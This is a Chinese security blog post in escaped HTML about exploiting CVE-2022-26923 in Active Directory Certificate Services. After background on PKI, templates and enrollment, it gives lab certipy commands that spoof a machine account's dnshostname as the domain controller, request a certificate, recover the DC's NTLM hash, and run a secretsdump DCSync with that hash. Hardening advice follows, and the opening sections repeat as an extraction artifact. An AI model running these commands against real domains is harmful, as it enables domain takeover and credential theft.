Infrastructure\uff09\u53ef\u80fd\u4f1a\u589e\u52a0\u590d\u6742\u6027\u548c\u5f00\u9500\u3002&lt;\/li&gt;\n&lt;li&gt;&lt;strong&gt;\u4f9d\u8d56\u4e8e\u8bc1\u4e66&lt;\/strong&gt;\uff1a\u8bc1\u4e66\u7684\u8fc7\u671f\u3001\u64a4\u9500\u6216\u5176\u4ed6\u95ee\u9898\u53ef\u80fd\u4f1a\u5bfc\u81f4\u8eab\u4efd\u9a8c\u8bc1\u5931\u8d25\u3002&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u603b\u4e4b\uff0cPKINIT\u4e3aKerberos\u63d0\u4f9b\u4e86\u4e00\u4e2a\u66f4\u5b89\u5168\u7684\u8eab\u4efd\u9a8c\u8bc1\u65b9\u6cd5\uff0c\u5c24\u5176\u662f\u5f53\u7ed3\u5408\u4f7f\u7528\u667a\u80fd\u5361\u65f6\u3002&lt;\/p&gt;\n&lt;h3&gt;4\u3001\u8bc1\u4e66\u6a21\u677f&lt;\/h3&gt;\n&lt;p&gt;\u8bc1\u4e66\u6a21\u677fCertificate 
Templates\u662fCA\u8bc1\u4e66\u9881\u53d1\u673a\u6784\u7684\u4e00\u4e2a\u7ec4\u6210\u90e8\u5206\uff0c\u662f\u8bc1\u4e66\u7b56\u7565\u4e2d\u7684\u91cd\u8981\u5143\u7d20\uff0c\u662f\u7528\u4e8e\u8bc1\u4e66\u6ce8\u518c\u3001\u4f7f\u7528\u548c\u7ba1\u7406\u7684\u4e00\u7ec4\u89c4\u5219\u548c\u683c\u5f0f\u3002\u5f53CA\u6536\u5230\u5bf9\u8bc1\u4e66\u7684\u8bf7\u6c42\u65f6\uff0c\u5fc5\u987b\u5bf9\u8be5\u8bf7\u6c42\u5e94\u7528\u4e00\u7ec4\u89c4\u5219\u548c\u8bbe\u7f6e\uff0c\u4ee5\u6267\u884c\u6240\u8bf7\u6c42\u7684\u529f\u80fd\uff0c\u4f8b\u5982\u8bc1\u4e66\u9881\u53d1\u6216\u66f4\u65b0\u3002\u8fd9\u4e9b\u89c4\u5219\u53ef\u4ee5\u662f\u7b80\u5355\u7684\uff0c\u4e5f\u53ef\u4ee5\u662f\u590d\u6742\u7684\uff0c\u4e5f\u53ef\u4ee5\u9002\u7528\u4e8e\u6240\u6709\u7528\u6237\u6216\u7279\u5b9a\u7684\u7528\u6237\u7ec4\u3002\u8bc1\u4e66\u6a21\u677f\u662f\u5728CA\u4e0a\u914d\u7f6e\u5e76\u5e94\u7528\u4e8e\u4f20\u5165\u8bc1\u4e66\u8bf7\u6c42\u7684\u4e00\u7ec4\u89c4\u5219\u548c\u8bbe\u7f6e\u3002\u8bc1\u4e66\u6a21\u677f\u8fd8\u5411\u5ba2\u6237\u673a\u63d0\u4f9b\u4e86\u5173\u4e8e\u5982\u4f55\u521b\u5efa\u548c\u63d0\u4ea4\u6709\u6548\u7684\u8bc1\u4e66\u8bf7\u6c42\u7684\u8bf4\u660e\u3002\u57fa\u4e8e\u8bc1\u4e66\u6a21\u677f\u7684\u8bc1\u4e66\u53ea\u80fd\u7531\u4f01\u4e1aCA\u9881\u53d1\u3002\u8fd9\u4e9b\u6a21\u677f\u5b58\u50a8\u5728\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1(ADDS)\u4e2d\uff0c\u4ee5\u4f9b\u6797\u4e2d\u7684\u6bcf\u4e2aCA\u4f7f\u7528\u3002\u8fd9\u5141\u8bb8CA\u59cb\u7ec8\u80fd\u591f\u8bbf\u95ee\u5f53\u524d\u6807\u51c6\u6a21\u677f\uff0c\u5e76\u786e\u4fdd\u8de8\u6797\u4e00\u81f4\u7684\u5e94\u7528\u3002&lt;\/p&gt;\n&lt;p&gt;\u8bc1\u4e66\u6a21\u677f\u901a\u8fc7\u5141\u8bb8\u7ba1\u7406\u5458\u53d1\u5e03\u5df2\u4e3a\u9009\u5b9a\u4efb\u52a1\u9884\u5148\u914d\u7f6e\u7684\u8bc1\u4e66\uff0c\u53ef\u4ee5\u5927\u5927\u7b80\u5316\u7ba1\u7406\u8bc1\u4e66\u9881\u53d1\u673a\u6784(CA)\u7684\u4efb\u52a1\u3002\u8bc1\u4e66\u6a21\u677f\u7ba1\u7406\u5355\u5143\u5141\u8bb8\u7ba1\u7406\u5458\u6267\u884c\u4ee5\u4
e0b\u4efb\u52a1\uff1a&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\u67e5\u770b\u6bcf\u4e2a\u8bc1\u4e66\u6a21\u677f\u7684\u5c5e\u6027&lt;\/li&gt;\n&lt;li&gt;\u590d\u5236\u548c\u4fee\u6539\u8bc1\u4e66\u6a21\u677f&lt;\/li&gt;\n&lt;li&gt;\u63a7\u5236\u54ea\u4e9b\u7528\u6237\u548c\u8ba1\u7b97\u673a\u53ef\u4ee5\u8bfb\u53d6\u6a21\u677f\u5e76\u6ce8\u518c\u8bc1\u4e66&lt;\/li&gt;\n&lt;li&gt;\u6267\u884c\u4e0e\u8bc1\u4e66\u6a21\u677f\u76f8\u5173\u7684\u5176\u4ed6\u7ba1\u7406\u4efb\u52a1&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a3e9eb.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;5\u3001\u8bc1\u4e66\u6ce8\u518c&lt;\/h3&gt;\n&lt;p&gt;\u4e0d\u540c\u6743\u9650\u7684\u57df\u7528\u6237\uff0c\u5728\u6ce8\u518c\u8bc1\u4e66\u65f6\uff0c\u53ea\u80fd\u6ce8\u518c\u5bf9\u5e94\u7684\u6a21\u677f\uff0c\u5728\u8bc1\u4e66\u6a21\u677f\u7684\u5b89\u5168\u5c5e\u6027\u4e2d\uff0c\u53ef\u4ee5\u770b\u5230\u54ea\u4e9b\u7528\u6237\u548c\u7ec4\u5177\u6709\u5f53\u524d\u8bc1\u4e66\u6a21\u677f\u7684\u6ce8\u518c\u6743\u9650\uff0c\u4e00\u4e2a\u8bc1\u4e66\u6ce8\u518c\u6d41\u7a0b\u5982\u4e0b\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a4b572.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;\u5ba2\u6237\u7aef\u751f\u6210\u4e00\u5bf9\u516c\u3001\u79c1\u94a5&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u5ba2\u6237\u7aef\u751f\u6210\u8bc1\u4e66\u7b7e\u540d\u8bf7\u6c42(CSR\uff0cCertificate Signing 
Request)\uff0c\u91cc\u9762\u5305\u542b\u5ba2\u6237\u7aef\u751f\u6210\u7684\u516c\u94a5\u4ee5\u53ca\u8bf7\u6c42\u7684\u8bc1\u4e66\u6a21\u677f\u3001\u8bf7\u6c42\u7684\u4e3b\u4f53\u7b49\u4fe1\u606f\u3002\u6574\u4e2aCSR\u7528\u5ba2\u6237\u7aef\u7684\u79c1\u94a5\u7b7e\u540d\uff0c\u53d1\u9001\u7ed9CA\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;CA\u6536\u5230\u8bf7\u6c42\u540e\uff0c\u4ece\u4e2d\u53d6\u51fa\u516c\u94a5\u5bf9CSR\u8fdb\u884c\u7b7e\u540d\u6821\u9a8c\u3002\u6821\u9a8c\u901a\u8fc7\u540e\u5224\u65ad\u5ba2\u6237\u7aef\u8bf7\u6c42\u7684\u8bc1\u4e66\u6a21\u677f\u662f\u5426\u5b58\u5728\uff0c\u5982\u679c\u5b58\u5728\uff0c\u6839\u636e\u8bc1\u4e66\u6a21\u677f\u4e2d\u7684\u5c5e\u6027\u5224\u65ad\u8bf7\u6c42\u7684\u4e3b\u4f53\u662f\u5426\u6709\u6743\u9650\u7533\u8bf7\u8be5\u8bc1\u4e66\u3002\u5982\u679c\u6709\u6743\u9650\uff0c\u5219\u8fd8\u8981\u6839\u636e\u5176\u4ed6\u5c5e\u6027\uff0c\u5982\uff1a\u53d1\u5e03\u8981\u6c42\u3001\u4f7f\u7528\u8005\u540d\u79f0\u3001\u6269\u5c55\u6765\u751f\u6210\u8bc1\u4e66\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;CA\u4f7f\u7528\u5176\u79c1\u94a5\u7b7e\u540d\u751f\u6210\u7684\u8bc1\u4e66\u5e76\u53d1\u9001\u7ed9\u5ba2\u6237\u7aef\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u5ba2\u6237\u7aef\u5b58\u50a8\u8be5\u8bc1\u4e66\u5728\u7cfb\u7edf\u4e2d\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;\u5982\u679c\u5728\u5b89\u88c5ADCS\u670d\u52a1\u7684\u65f6\u5019\uff0c\u52fe\u9009\u4e86\u201c\u8bc1\u4e66\u9881\u53d1\u673a\u6784Web\u6ce8\u518c\u201d\u9009\u9879\uff0c\u90a3\u4e48\u5219\u53ef\u4ee5\u901a\u8fc7Web\u65b9\u5f0f\u6765\u7533\u8bf7\u8bc1\u4e66\uff0c\u5982\u679c\u8bc1\u4e66\u7533\u8bf7\u7684Web\u9875\u9762\u652f\u6301NTLM\u8ba4\u8bc1\uff08\u9ed8\u8ba4\u652f\u6301\uff09\uff0c\u5219\u53ef\u80fd\u88abNTLM\u4e2d\u7ee7\u653b\u51fb:&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a5cf95.&quot; alt=&quot;&quot; 
\/&gt;&lt;\/p&gt;\n&lt;p&gt;\u901a\u8fc7\u57df\u8d26\u53f7\u8ba4\u8bc1\u540e\u767b\u9646\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a66baa.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h4&gt;\uff081\uff09\u666e\u901a\u57df\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66&lt;\/h4&gt;\n&lt;p&gt;\u666e\u901a\u57df\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66\u65f6\uff0cADCS\u670d\u52a1\u5668\u901a\u8fc7userPrincipalName\u6216sAMAccountName\u5c5e\u6027\u67e5\u627e\u5bf9\u5e94\u7528\u6237\uff0c\u5e76\u8fd4\u56dePAC\u548c\u7528\u6237Hash\uff0c\u800c\u8fd9\u4e24\u4e2a\u5c5e\u6027\u5728\u57df\u5185\u662f\u552f\u4e00\u7684\uff0c\u6240\u4ee5\u6574\u4e2a\u6d41\u7a0b\u53ef\u786e\u4fdd\u4e00\u4e00\u5bf9\u5e94\u5173\u7cfb\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a70f2a.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h4&gt;\uff082\uff09\u8ba1\u7b97\u673a\u8d26\u53f7\u6ce8\u518c\u8bc1\u4e66&lt;\/h4&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;\u8ba1\u7b97\u673a\u8d26\u53f7\u5728\u6ca1\u6709\u8bbe\u7f6edNSHostName\u5c5e\u6027\u65f6\uff0cADCS\u670d\u52a1\u5668\u65e0\u6cd5\u5224\u65ad\u8bf7\u6c42\u673a\u5668\u7684\u8eab\u4efd\uff0c\u56e0\u6b64\u65e0\u6cd5\u751f\u6210\u8bc1\u4e66&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u8ba1\u7b97\u673a\u8d26\u53f7\u8bbe\u7f6e\u4e86dNSHostName\u5c5e\u6027\u65f6\uff0cADCS\u670d\u52a1\u5668\u6839\u636edNSHostName\u5c5e\u6027\u7684\u503c\u6765\u751f\u6210\u5bf9\u5e94\u8bc1\u4e66\uff0c\u5728\u6574\u4e2aADCS\u670d\u52a1\u5668\u751f\u6210\u673a\u5668\u8bc1\u4e66\u7684\u8fc7\u7a0b\u4e2d\uff0c\u53ea\u6709dNSHostName\u5c5e\u6027\u51b3\u5b9a\u4e86\u8bc1\u4e66\u6240\u5c5e\u7684\u673a\u5668\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;KDC\u5728\u6536\u5230\u673a\u5668\u8d26\u53f7PKINIT Kerberos\u8ba4\u8bc1\u65f6\uff0cKDC\u4f1a\u53d6\u51fa\u8bc1\u4e66\u4e2d\u201c\u4f7f\u7528\u8005\u53ef\u9009\u540d\u79f0\u201d\u4e2dDNS 
Name\u7684\u503c\uff0c\u7136\u540e\u67e5\u8be2sAMAccountName\u5c5e\u6027\u5bf9\u5e94\u7684\u6761\u76ee\uff0c\u7528\u8be5\u6761\u76ee\u7684\u6743\u9650\u751f\u6210PAC\uff0c\u5728\u8fd9\u4e2a\u8fc7\u7a0b\u5e76\u4e0d\u4f1a\u641c\u7d22\u548c\u6821\u9a8cdNSHostName\u5c5e\u6027\u3002&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u56e0\u6b64\u53ea\u6709dNSHostName\u5c5e\u6027\u5f71\u54cdADCS\u670d\u52a1\u5668\u751f\u6210\u5bf9\u5e94\u673a\u5668\u7684\u8bc1\u4e66\uff0c\u5e76\u4e14\u5728\u57df\u5185dNSHostName\u5c5e\u6027\u5e76\u4e0d\u5177\u6709\u552f\u4e00\u6027\uff0c\u56e0\u6b64\u53ef\u4ee5\u5229\u7528\u666e\u901a\u57df\u7528\u6237\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\uff0c\u7136\u540e\u4fee\u6539\u8be5\u8ba1\u7b97\u673a\u8d26\u53f7\u7684dNSHostName\u5c5e\u6027\u4e3a\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u540d\uff0c\u8fd9\u6837\u901a\u8fc7\u65b0\u6dfb\u52a0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8bc1\u4e66\uff0c\u5c31\u53ef\u4ee5\u6b3a\u9a97ADCS\u7b7e\u53d1\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u8eab\u4efd\u7684\u8bc1\u4e66\uff0c\u518d\u7528\u8be5\u8bc1\u4e66\u8fdb\u884cPKINIT\u8ba4\u8bc1\uff0c\u5373\u53ef\u83b7\u5f97\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\u7684NTLM\u54c8\u5e0c&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a7a2be.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h2&gt;\u4e8c\u3001\u5229\u7528\u6761\u4ef6&lt;\/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;\u57df\u63a7\u5b89\u88c5\u4e86\u8bc1\u4e66\u670d\u52a1&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u5177\u6709\u4e00\u4e2a\u6709\u6743\u9650\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u57df\u8d26\u53f7\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u6bcf\u4e2a\u666e\u901a\u57df\u8d26\u53f7\u6709\u6dfb\u52a010\u4e2a\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u6743\u9650&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u8ba1\u7b97\u673a\u8d26\u53f7\u5177\u6709\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66\u6743\u9650\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u5177\u6709\u8fd9\u4e2a\u6743\u9650&lt;br \/&gt;\n&lt;img 
src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a8a7fe.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;CVE-2022-26923\u8865\u4e01\u6ca1\u6253&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u65e0\u8bba\u662f\u5426\u5f00\u542f\u4e86\u8bc1\u4e66Web\u6ce8\u518c\u63a5\u53e3\u90fd\u53ef\u4ee5\u6253\uff0c\u56e0\u4e3a\u901a\u8fc7rpc\u4e5f\u53ef\u4ee5\u6ce8\u518c\u8bc1\u4e66&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n&lt;h2&gt;\u4e09\u3001\u5229\u7528\u8fc7\u7a0b&lt;\/h2&gt;\n&lt;p&gt;&lt;strong&gt;\u6d4b\u8bd5\u73af\u5883\uff1a&lt;\/strong&gt;&lt;\/p&gt;\n&lt;table&gt;\n&lt;thead&gt;\n&lt;tr&gt;\n&lt;th&gt;\u4e3b\u673a\u540d&lt;\/th&gt;\n&lt;th&gt;\u4e3b\u673aIP&lt;\/th&gt;\n&lt;th&gt;\u4e3b\u673a\u8d26\u6237&lt;\/th&gt;\n&lt;th&gt;\u4e3b\u673a\u63cf\u8ff0&lt;\/th&gt;\n&lt;\/tr&gt;\n&lt;\/thead&gt;\n&lt;tbody&gt;\n&lt;tr&gt;\n&lt;td&gt;dc-main-1.qiuqiu.com&lt;\/td&gt;\n&lt;td&gt;10.10.10.10&lt;\/td&gt;\n&lt;td&gt;qiuqiu.com\\domain_admin&lt;\/td&gt;\n&lt;td&gt;\u4e3b\u57df&lt;\/td&gt;\n&lt;\/tr&gt;\n&lt;tr&gt;\n&lt;td&gt;user1.qiuqiu.com&lt;\/td&gt;\n&lt;td&gt;10.100.0.6&lt;\/td&gt;\n&lt;td&gt;qiuqiu.com\\yefan&lt;\/td&gt;\n&lt;td&gt;\u666e\u901a\u57df\u5185\u673a\u5668\uff0c\u88ab\u653b\u51fb\u8005\u63a7\u5236&lt;\/td&gt;\n&lt;\/tr&gt;\n&lt;\/tbody&gt;\n&lt;\/table&gt;\n&lt;h3&gt;1\u3001\u5b9a\u4f4dADCS\u670d\u52a1\u4ee5\u53caCA\u6839\u8bc1\u4e66&lt;\/h3&gt;\n&lt;p&gt;\u83b7\u53d6\u5230ADCS\u670d\u52a1\u5668\u5730\u5740\u4e3a&lt;code&gt;dc-main-1.qiuqiu.com&lt;\/code&gt;\uff0cCA\u6839\u8bc1\u4e66\u540d\u4e3a&lt;code&gt;qiuqiu-DC-MAIN-1-CA&lt;\/code&gt;&lt;\/p&gt;\n&lt;pre&gt;&lt;code&gt;certutil -dump -v&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a943c8.&quot; alt=&quot;&quot; 
\/&gt;&lt;\/p&gt;\n&lt;p&gt;\u5982\u679c\u653b\u51fb\u8005\u5728\u57df\u5916\uff0c\u53ef\u4ee5\u4f7f\u7528&lt;code&gt;certipy&lt;\/code&gt;\u5de5\u5177\u5b9a\u4f4d\uff0c\u9664\u4e86\u660e\u6587\u8d26\u5bc6\uff0c\u4e5f\u652f\u6301PTH\u65b9\u5f0f\u8ba4\u8bc1\uff1a&lt;\/p&gt;\n&lt;pre&gt;&lt;code&gt;\/\/ pip\u5b89\u88c5\npip3 install certipy-ad\n\ncertipy find -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -debug&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27a9dd35.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;2\u3001\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7\u5e76\u8bbe\u7f6ednshostname\u5c5e\u6027&lt;\/h3&gt;\n&lt;pre&gt;&lt;code&gt;certipy account create -u yefan@qiuqiu.com -p Test1234 -dc-ip 10.10.10.10 -user &quot;fake_cert&quot; -pass Test1234 -dns dc-main-1.qiuqiu.com -debug&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27aa6211.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;p&gt;\u53ef\u4ee5\u5728\u57df\u63a7\u4e0a\u770b\u5230\uff0c\u65b0\u6dfb\u52a0\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\uff0cdnshostname\u5b57\u6bb5\u4e0e\u5f53\u524d\u8d26\u53f7\u540d\u4e0d\u5339\u914d\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27aaf67a.&quot; alt=&quot;&quot; 
\/&gt;&lt;\/p&gt;\n&lt;h3&gt;3\u3001\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u7533\u8bf7\u8ba1\u7b97\u673a\u6a21\u677f\u8bc1\u4e66&lt;\/h3&gt;\n&lt;p&gt;\u4f7f\u7528\u4e4b\u524d\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u8ba4\u8bc1\uff0c\u5e76\u4f7f\u7528ADCS\u4e2d\u7684CA\u6839\u8bc1\u4e66\u4e3a\u5f53\u524d\u8ba1\u7b97\u673a\u8d26\u53f7\u7b7e\u53d1\u4e00\u4e2a\u8ba1\u7b97\u673a\u6a21\u677f\u7684\u8bc1\u4e66\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u5f53\u8bc1\u4e66\u7533\u8bf7\u6210\u529f\u540e\uff0c\u8fd4\u56de\u7684dnshostname\u5b57\u6bb5\u4e3a\u57df\u63a7\u8ba1\u7b97\u673a\u8d26\u53f7\uff1a&lt;\/p&gt;\n&lt;pre&gt;&lt;code&gt;certipy req -u fake_cert$ -p Test1234 -dc-ip 10.10.10.10 -ca qiuqiu-DC-MAIN-1-CA -template Machine -debug&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ab9e63.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;p&gt;\u5728\u57df\u63a7\u4e0a\u53ef\u4ee5\u770b\u5230\u65b0\u9881\u53d1\u7684\u8ba1\u7b97\u673a\u8d26\u53f7\u8bc1\u4e66\uff1a&lt;\/p&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ac2d3d.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;4\u3001\u4f7f\u7528\u8bc1\u4e66\u8fdb\u884ckerberos\u8ba4\u8bc1\u5e76\u83b7\u5f97\u5bf9\u5e94\u7528\u6237\u7684NTLM\u54c8\u5e0c&lt;\/h3&gt;\n&lt;p&gt;\u4f7f\u7528\u8ba1\u7b97\u673a\u8d26\u53f7\u8bc1\u4e66\u901a\u8fc7kerberos\u8ba4\u8bc1\u540e\uff0c\u4f1a\u8fd4\u56de\u5bf9\u5e94\u7528\u6237\u7684TGT\u7968\u636e\uff0c\u5728TGT\u4e2d\u7684PAC\u4e2d\uff0c\u5305\u542b\u4e86\u7528\u6237\u7684NTLM\u54c8\u5e0c&lt;\/p&gt;\n&lt;pre&gt;&lt;code&gt;certipy auth -pfx dc-main-1.pfx -dc-ip 10.10.10.10 -debug&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27acb407.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;h3&gt;5\u3001dcsync\u57df\u63a7hash&lt;\/h3&gt;\n&lt;pre&gt;&lt;code&gt;secretsdump.py -hashes 
aad3b435b51404eeaad3b435b51404ee:6ccc4c07fe69157e48976165a273b13b &quot;qiuqiu.com\/dc-main-1$@10.10.10.10&quot;&lt;\/code&gt;&lt;\/pre&gt;\n&lt;p&gt;&lt;img src=&quot;http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1020-69fda27ad4a32.&quot; alt=&quot;&quot; \/&gt;&lt;\/p&gt;\n&lt;p&gt;\u83b7\u53d6\u5230\u57df\u7ba1\u4ee5\u53cakrbtgt\u8d26\u53f7\u7684hash\uff0c\u540e\u7eed\u5229\u7528\u4e0d\u518d\u8d58\u8ff0\u3002&lt;\/p&gt;\n&lt;h2&gt;\u56db\u3001\u52a0\u56fa\u65b9\u6848&lt;\/h2&gt;\n&lt;ul&gt;\n&lt;li&gt;\n&lt;p&gt;\u7981\u7528\u666e\u901a\u57df\u7528\u6237\u521b\u5efa\u8ba1\u7b97\u673a\u8d26\u53f7&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u5982\u65e0\u9700\u8981\uff0c\u7981\u7528\u666e\u901a\u57df\u7528\u6237\uff0c\u4ee5\u53ca\u8ba1\u7b97\u673a\u8d26\u53f7\u521b\u5efa\u8bc1\u4e66&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;li&gt;\n&lt;p&gt;\u6253\u8865\u4e01&lt;\/p&gt;\n&lt;\/li&gt;\n&lt;\/ul&gt;\n<\/div><div class=\"gfmr-markdown-rendered\"><h2><span class=\"ez-toc-section\" id=\"%E4%B8%80%E3%80%81%E8%83%8C%E6%99%AF%E7%9F%A5%E8%AF%86\"><\/span>\u4e00\u3001\u80cc\u666f\u77e5\u8bc6<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><span class=\"ez-toc-section\" id=\"1%E3%80%81PKI%E5%85%AC%E9%92%A5%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD\"><\/span>1\u3001PKI\u516c\u94a5\u57fa\u7840\u8bbe\u65bd<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>PKI\uff08Public Key Infrastructure\uff09\u516c\u94a5\u57fa\u7840\u8bbe\u65bd\uff0c\u662f\u63d0\u4f9b\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u670d\u52a1\u7684\u7cfb\u7edf\u6216\u5e73\u53f0\uff0c\u662f\u4e00\u4e2a\u5305\u62ec\u786c\u4ef6\u3001\u8f6f\u4ef6\u3001\u4eba\u5458\u3001\u7b56\u7565\u548c\u89c4\u7a0b\u7684\u96c6\u5408\uff0c\u7528\u6765\u5b9e\u73b0\u57fa\u4e8e\u516c\u94a5\u5bc6\u7801\u4f53\u5236\u7684\u5bc6\u94a5\u548c\u8bc1\u4e66\u7684\u4ea7\u751f\u3001\u7ba1\u7406\u3001\u5b58\u50a8\u3001\u5206\u53d1\u548c\u64a4\u9500\u7b49\u529f\u80fd\u3002\u4f01\u4e1a\u901a\u8fc7\u91c7\u7528 PKI 
\u6846\u67b6\u7ba1\u7406\u5bc6\u94a5\u548c\u8bc1\u4e66\u53ef\u4ee5\u5efa\u7acb\u4e00\u4e2a\u5b89\u5168\u7684\u7f51\u7edc\u73af\u5883\u3002<\/p>\n<p>PKI\u7684\u57fa\u7840\u6280\u672f\u5305\u62ec\uff1a\u516c\u94a5\u52a0\u5bc6\u3001\u6570\u5b57\u7b7e\u540d\u3001\u6570\u636e\u5b8c\u6574\u6027\u673a\u5236\u3001\u6570\u5b57\u4fe1\u5c01(\u6df7\u5408\u52a0\u5bc6)\u3001\u53cc\u91cd\u6570\u5b57\u7b7e\u540d\u7b49\u3002<\/p>\n<p>PKI\u4f53\u7cfb\u80fd\u591f\u5b9e\u73b0\u7684\u529f\u80fd\u6709\uff1a<\/p>\n<ul>\n<li>\u8eab\u4efd\u9a8c\u8bc1<\/li>\n<li>\u6570\u636e\u5b8c\u6574\u6027<\/li>\n<li>\u6570\u636e\u673a\u5bc6\u6027<\/li>\n<li>\u64cd\u4f5c\u7684\u4e0d\u53ef\u5426\u8ba4\u6027<\/li>\n<\/ul>\n<p>\u5fae\u8f6f\u7684\u6d3b\u52a8\u76ee\u5f55\u8bc1\u4e66\u670d\u52a1<strong>ADCS\u5c31\u662f\u5bf9PKI\u7684\u5b9e\u73b0<\/strong>\uff0c\u6d3b\u52a8\u76ee\u5f55\u8bc1\u4e66\u670d\u52a1\u80fd\u591f\u8ddf\u73b0\u6709\u7684\u6d3b\u52a8\u76ee\u5f55\u57df\u670d\u52a1ADDS\u8fdb\u884c\u7ed3\u5408\uff0c\u53ef\u4ee5\u7528\u4e8e\u8eab\u4efd\u9a8c\u8bc1\u3001\u516c\u94a5\u52a0\u5bc6\u548c\u6570\u5b57\u7b7e\u540d\u7b49\u3002ADCS\u63d0\u4f9b\u6240\u6709\u4e0ePKI\u76f8\u5173\u7684\u7ec4\u4ef6\u4f5c\u4e3a\u89d2\u8272\u670d\u52a1\u3002\u6bcf\u4e2a\u89d2\u8272\u670d\u52a1\u8d1f\u8d23\u8bc1\u4e66\u57fa\u7840\u67b6\u